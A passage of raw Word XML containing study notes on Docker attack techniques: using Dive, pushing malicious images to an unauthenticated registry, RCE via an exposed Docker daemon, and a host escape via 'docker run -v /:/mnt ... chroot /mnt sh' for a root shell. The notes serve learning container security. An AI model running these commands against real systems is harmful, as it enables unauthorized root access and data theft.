    <w:p w14:paraId="1E93029E" w14:textId="27B3D57A" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39115FA5" w14:textId="0D5F7937" w:rsidR="00230140" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9DA3F" w14:textId="529666F1" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shows layers and stages docker container has gone through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF81379" w14:textId="1DBB7A2A" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>navigate with directional keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE034F5" w14:textId="3A484C26" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Current Layer Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E2E9E" w14:textId="6384A380" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shows contents of the containers filesystem at the selected layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D062C" w14:textId="72814614" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Layer Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A72A3" w14:textId="3C4A6677" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shows misc info such as ID of layer and any command executed in the Dockerfile for that layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49A878" w14:textId="381021B8" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Swap between windows with tab key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA609D" w14:textId="5B280B9D" w:rsidR="007B4F36" w:rsidRDefault="007B4F36" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Disassembling Our First Image in Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5272C2" w14:textId="209751A5" w:rsidR="007B4F36" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>View layers, and their corresponding Current Layer Contents for commands, creation of files, input, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6823D7DE" w14:textId="123F61EA" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability #3 – Uploading Malicious Docker Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C084E" w14:textId="403F45DD" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using push command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668018E" w14:textId="3AAFE4D2" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>without proper authentication, can upload own image to target registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA1293" w14:textId="53501DEE" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>next time owner runs a docker pull or docker run command, host will download and execute malicious image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43991099" w14:textId="0CCDB61A" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create docker file and compile into an image with docker build command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFBFC3" w14:textId="042865E2" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>compile and add to vulnerable registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD943DB" w14:textId="1BE4CC75" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>connection will be within image, not actual host, but lays ground work for working for config files, credentials, or escaping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33845402" w14:textId="61C712C5" w:rsidR="006E447B" w:rsidRDefault="006E447B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability #4 – RCE via Exposed Docker Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27E7FC" w14:textId="42AF3217" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unix Sockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56217465" w14:textId="5425312A" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>moves data within the host itself by using filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBEE0D" w14:textId="56DC8E32" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Interprocess Communication (IPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647F86B" w14:textId="03E69130" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Relevance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C8301" w14:textId="0415A846" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker commands are executed by internal sockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE54618" w14:textId="4FC1F05E" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>default UNIX socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F2AC7" w14:textId="0A28F80E" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to be part of docker group to use docker commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0F20C" w14:textId="443A2350" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05698909" w14:textId="7F3BFD62" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developer automation requires use of TCP sockets, as opposed to UNIX sockets, for remote application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B748CD1" w14:textId="5CD75037" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D2A84" w14:textId="1DBD64F9" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D770F6" w14:textId="578B1610" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap for Docker service and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA51BC" w14:textId="627F0062" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Confirming Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3EA9A9" w14:textId="4D61FE9A" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>curl command to start interacting with exposed Docker daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43713090" w14:textId="0A732576" w:rsidR="0034034A" w:rsidRDefault="0034034A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00384A64" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/version</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B7365A5" w14:textId="49B08373" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>response confirms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFACFE" w14:textId="6AF46F13" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E562583" w14:textId="3E843575" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specify Instance to list containers running using -H command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71039B79" w14:textId="3E15709F" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker -H tcp://&lt;ip&gt;:&lt;port&gt; ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E6B3D" w14:textId="039E01FD" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB1211" w14:textId="4DEC2739" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9995C" w14:textId="1F60F79A" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>network ls – list networks of containers – discover other applications and pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66079992" w14:textId="31402950" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>images – list images used by containers, data can be exfiltrated by reverse engineering image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DA547" w14:textId="02519BBD" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exec – execute a command on a container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0585C" w14:textId="722F1781" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run – run a container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5A4E8" w14:textId="60684E5A" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Further Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92AEC9" w14:textId="39CCE1D2" w:rsidR="00384A64" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId196" w:history="1">
        <w:r w:rsidR="00384A64" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/sangam14/dockercheatsheets/master/dockercheatsheet8.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11F4231C" w14:textId="71E31933" w:rsidR="00384A64" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidR="00384A64" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://registry.hub.docker.com/r/chrisfosterelli/rootplease</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B12DBAF" w14:textId="32CAED82" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use Docker to create root shell on device itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E065A5C" w14:textId="29E60B76" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability #5 – Escape via Exposed Docker Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795277D1" w14:textId="7D7083FA" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Connecting to the Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60840122" w14:textId="70C3C854" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E93C06" w14:textId="0C2FCF1C" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Looking for exposed Docker socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21292949" w14:textId="782C8B7D" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for exposure of file within container and confirm user permissions with groups command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF03883" w14:textId="7436ED7E" w:rsidR="00384A64" w:rsidRDefault="00384A64" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Mount Host Volumes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C9CD7" w14:textId="12172898" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get alpine Docker image to container being exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D05B2" w14:textId="59AB925C" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mount host directory to a new container and connect to reveal data on host OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261AC1B8" w14:textId="34F56A3F" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd /var/run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244077D5" w14:textId="45F9BA25" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker run -v /:/mnt –rm -it alpine chroot /mnt sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866ED51" w14:textId="3A0D75C2" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>should get # shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B75EF" w14:textId="3FEB7A30" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Verify Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB60A6" w14:textId="5E2951E7" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id, ls, groups, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237EC2C" w14:textId="73F10014" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>escape successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D03E3" w14:textId="62B544C4" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
